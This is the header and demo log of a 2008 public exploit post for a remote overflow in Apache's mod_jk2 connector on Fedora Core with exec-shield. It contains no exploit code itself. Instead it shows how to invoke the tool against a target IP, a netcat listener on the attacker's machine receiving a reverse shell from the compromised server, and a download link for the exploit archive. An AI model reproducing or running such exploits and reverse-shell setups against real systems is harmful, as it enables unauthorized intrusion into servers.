/*
**
** Fedora Core 6,7,8 (exec-shield) based
** Apache Tomcat Connector jk2-2.0.2(mod_jk2) remote overflow exploit
** by INetCop Security
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://www.milw0rm.com/papers/151
**
** IOActive Security Advisory:
** http://www.securityfocus.com/archive/1/487983
**
** Heretic2(heretic2x@gmail.com)'s exploit (Win32):
** http://www.milw0rm.com/exploits/5330
**
** --
** exploit by INetCop Security.
*/
/*
** --
** $ ./0x82-apache-mod_jk2 61.xx.xx.20 80 61.xx.xx.30
**
** Fedora Core release 6 (exec-shield) based
** Apache Tomcat Connector (mod_jk2) remote overflow exploit
** Target Version: Apache/2.0.53 (Unix) mod_jk2/2.0.2
** by INetCop Security
**
** + make socket
** + make exploit payload
** + try connected 61.42.25.22:80
** + exploit send!
** * attacker host, check it up, now! :-D
**
** $
** --
**
** attacker's server port 56789: --
** $ nc -l -p 56789 -vv
** listening on [any] 56789 ...
** 61.xx.xx.20: inverse host lookup failed: Unknown host
** connect to [61.xx.xx.30] from (UNKNOWN) [61.xx.xx.20] 47576
** id
** --
**
** attacker's server port 5678: --
** $ nc -l -p 5678 -vv
** listening on [any] 5678 ...
** 61.xx.xx.20: inverse host lookup failed: Unknown host
** connect to [61.xx.xx.30] from (UNKNOWN) [61.xx.xx.20] 52452
** uid=99(nobody) gid=4294967295 groups=4294967295 context=root:system_r:unconfined_t:s0-s0:c0.c1023
** --
**
*/

http://milw0rm.com/sploits/2008-x2_fc6f7f8.tar.gz

# milw0rm.com [2008-04-06]